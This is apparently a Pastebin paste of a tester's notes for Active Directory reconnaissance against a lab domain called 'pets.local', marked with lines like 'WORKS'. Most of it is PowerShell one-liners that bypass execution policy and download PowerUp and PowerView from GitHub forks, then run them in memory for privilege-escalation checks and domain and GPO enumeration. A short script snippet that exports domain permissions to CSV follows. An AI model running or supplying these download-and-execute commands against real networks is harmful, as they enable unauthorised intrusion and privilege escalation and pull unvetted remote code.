Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Setup
- #
- #
- https://github.com/FuzzySecurity/StandIn#list-gpos
- C:\Users\win11user\Downloads\StandIn_v13_Net35_45> .\StandIn_v13_Net35.exe --gpo
- #
- #
- # ensure IPv4 and IPv6 is on the joined computer pointing to AD
- # Add-Computer -DomainName “Domain Name” -Credential “Domain Username”
- #import-module ActiveDirectory
- Get-WindowsCapability -Name RSAT* -Online | Select-Object -Property DisplayName, Stat
- #Get-WindowsCapability -Name RSAT* -Online | Add-WindowsCapability –Online
- Add-WindowsCapability –online –Name “Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0”
- Add-WindowsCapability -Online -Name Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0
- # Get-GPOReport -All -Domain "corp.contoso.com" -Server "HYD-DC1" -ReportType XML -Path "C:\GPOReports\GPOReportsAll.xml"
- #WORKSWORKSWORKSWORKS
- powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/jessefmoore/PowerSploit/master/Privesc/PowerUp.ps1'); Invoke-AllChecks"
- ###############################################################################################################
- #WORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKS##########
- ###############################################################################################################
- powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-NetDomain -Domain pets.local"
- #WWWWWWWWWWWWWWWWWh
- powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-NetGPO"
- GOOOOOOOOOOOOOOOOOOOOOOOOD
- powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-NetDomain -Domain pets.local"
- NNEEEEEEEEEEEEEEEEEEEEEEEEEEEEEWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
- powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ZeroDayLab/PowerSploit/master/Recon/PowerView.ps1'); Get-NetDomain -Domain pets.local"
- powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ZeroDayLab/PowerSploit/master/Recon/PowerView.ps1'); Get-NetGPO"
- #Get-GPO -All -Domain "corp.contoso.com"
- # Get-GPO -Domain pets.local -All
- #powershell -nop -exec bypass -c "IEX (New-Object #Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1'); Get-DomainGPO"
- #
- "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-DomainGPO"
- #
- #"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-#SECURITY/Empire/master/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-DomainGPO | Get-DomainPolicy"
- #
- #
- Write-Output "Gathering Domain Permissions for $Domain"
- $ForestDomainObjectData = Get-ADObject $ADDomainInfo.DistinguishedName -Properties * -Server $DomainDC
- $ForestDomainObjectSecurityData = $ForestDomainObjectData.nTSecurityDescriptor.Access
- $ForestDomainObjectPermissions = @()
- ForEach ($ForestDomainObjectSecurityDataItem in $ForestDomainObjectSecurityData)
- {
- $ObjectTypeName = Get-NameForGUID $ForestDomainObjectSecurityDataItem.ObjectType -ForestDNSName $ForestDNSName
- $InheritedObjectTypeName = Get-NameForGUID $ForestDomainObjectSecurityDataItem.InheritedObjectType -ForestDNSName $ForestDNSName
- $ForestDomainObjectSecurityDataItem | Add-Member -MemberType NoteProperty -Name Domain -Value $Domain -Force
- $ForestDomainObjectSecurityDataItem | Add-Member -MemberType NoteProperty -Name ObjectTypeName -Value $ObjectTypeName -Force
- $ForestDomainObjectSecurityDataItem | Add-Member -MemberType NoteProperty -Name InheritedObjectTypeName -Value $InheritedObjectTypeName -Force
- [array]$ForestDomainObjectPermissions += $ForestDomainObjectSecurityDataItem
- }
- $ForestDomainObjectPermissionFile = $ReportDir + "\TrimarcADChecks-DomainRootPermissionReport-$Domain-$TimeVal.csv"
- $ForestDomainObjectPermissions | Sort IdentityReference | Select IdentityReference,ActiveDirectoryRights,InheritedObjectTypeName,ObjectTypeName,`
- InheritanceType,ObjectFlags,AccessControlType,IsInherited,InheritanceFlags,PropagationFlags,ObjectType,InheritedObjectType | `
- Export-CSV $ForestDomainObjectPermissionFile -NoTypeInformation
- Write-Host "Active Directory Domain Permission report saved to the file $ForestDomainObjectPermissionFile" -Fore Cyan
- Write-Host ""
Add Comment
Please, Sign In to add comment